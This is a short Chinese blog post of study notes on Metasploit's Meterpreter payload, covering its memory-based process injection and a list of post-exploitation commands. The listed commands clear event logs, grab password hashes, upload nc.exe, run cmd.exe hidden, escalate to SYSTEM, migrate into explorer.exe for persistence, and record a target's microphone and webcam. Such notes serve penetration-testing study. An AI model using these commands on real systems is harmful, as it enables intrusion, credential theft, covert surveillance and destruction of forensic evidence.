pyqb

导航

 

基于内存的DLL注入式payload

  注入合法的系统进程并建立stager

  基于stager上传和预加载DLL进行扩展模块的注入(客户端API)

  基于stager建立的socket连接建立加密的TLS/1.0通信隧道(避免网络取证)

  利用TLS隧道进一步加载后续扩展模块

 

meterpreter服务器使用C语言编写,客户端基于ruby的全特性API(支持任何语言)

 

 

进入到meterpreter的shell

help命令查看命令帮助手册

background后退到msf的命令提示符界面

pwd当前目录,cd,ls,mkdir,rmdir删除目录,mv,cat,rm,edit相当于vi,

lcd,lpwd 本地linux的目录操作

run运行模块

bgrun后台运行模块,有两百多个模块可以使用

比如杀掉杀毒程序的模块

 获取用户密码hash

远程桌面

clearev 清除事件日志

清理前可以看到这么多日志

运行clearev之后

 时间日志就被清除了

 

 

download 下载文件

将目标主机上的文件下载到本地

upload 上传文件

将本机文件上传到目标机器上

上传一个nc.exe到目标主机

 

执行execute

execute -f cmd.exe -i -H

后台执行cmd.exe

 

getuid查看当前账号

getsystem获取system权限

getprivs,查看权限

getproxy,获取代理

getpid 查看payload注入的是哪个进程

ps查看目标主机上运行的进程,可以看到对应的进程是svchost.exe

我们可以将注入迁移到其他的进程 migrate

比如迁移到explorer.exe上,注入更持久

就迁移到1512进程上了

 

sysinfo查看目标主机信息

 

kill 杀死进程

 

reboot重启目标机器

 

shell获取shell

 

show_mount 查看硬盘信息

 

搜索文件

 

arp 查看arp缓存

 

netstat查看网络连接情况

 

ifconfig、ipconfig 查看当前IP

 

route 查看路由表

route -add 添加路由表 -delete删除路由表

 

idletime 查看目标机器空闲时间

 

resource 添加脚本执行文件,一键执行多条指令

比如先建立一个脚本文件

里面打个比方放上两条指令

然后调用这个脚本文件 resource -r r.txt,就逐步执行刚才的两条指令

 

record_mic 记录麦克风

 

webcam_list 列出目标机器上连接的摄像头

 

webcam_snap -i 1 -v false 每隔一秒拍摄一张图片

 

meterpreter python 扩展

客户端无需运行环境,就可以运行原生python代码,无需编译

这个扩展是以插件的形式,需要加载到meterprete

 help查看就会看到多出来几个python的命令

 

python execute 直接执行命令

 

python_import 加载python文件

比如有一个find.py

执行

然后就可以自己写python工具!

 

posted on 2017-04-27 16:12  没有音乐就退化耳朵  阅读(760)  评论(0编辑  收藏  举报